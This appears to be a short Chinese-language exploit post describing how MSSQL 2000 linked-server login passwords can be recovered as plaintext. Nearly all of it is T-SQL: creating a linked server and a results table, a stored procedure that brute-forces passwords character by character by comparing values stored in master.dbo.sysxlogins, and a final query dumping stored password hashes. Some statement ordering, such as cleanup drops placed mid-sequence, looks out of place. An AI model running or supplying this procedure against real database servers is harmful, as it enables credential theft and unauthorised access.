MSSQL2000链接服务器的密码破解为明文的漏洞

第一步,先建立一个 linkserver
sp_addlinkedserver 'dhlinkserver','','SQLOLEDB','127.0.0.1','','','master'
第二步,创建一个表,用于存放计算出来的HASH
create table mssql (list int not null identity (1,1), pass nvarchar(500),code varbinary(256))
sp_dropserver 'dhlinkserver', 'droplogins'
drop table mssql
DROP PROCEDURE pwd
第三步 创建破解用的存储过程
create   procedure   pwd
@pwd sysname = NULL
AS
    declare @ss varchar(256),@str varchar (256),@getpass varbinary(256)
    truncate table mssql
    create table #t (inetpub nvarchar(500))
    select @ss=@pwd+'abcdefghijklmnopqrstuvwxyz`0123456789-=[]\;,./~!@#$%^&*()_+{}|:<>?'
    declare @index int
    select @index=1
    while (@index <=len(@ss))
    begin
        insert #t(inetpub) select SUBSTRING (@ss,@index,1)
        select @index = @index +1
        select @str=@pwd+inetpub from #t
        exec master.dbo.sp_addlinkedsrvlogin 'dhlinkserver','false',Null,'xxxx',@str
        select @getpass = password from master.dbo.sysxlogins where name ='xxxx'
        insert into mssql(pass,code) values (@str,@getpass)
    end
select list,pass,master.dbo.fn_VarBinToHexStr(code)code from mssql
    drop table #t
第四步，查询现在数据库里存储的密码
select name,master.dbo.fn_VarBinToHexStr(password)pass from master.dbo.sysxlogins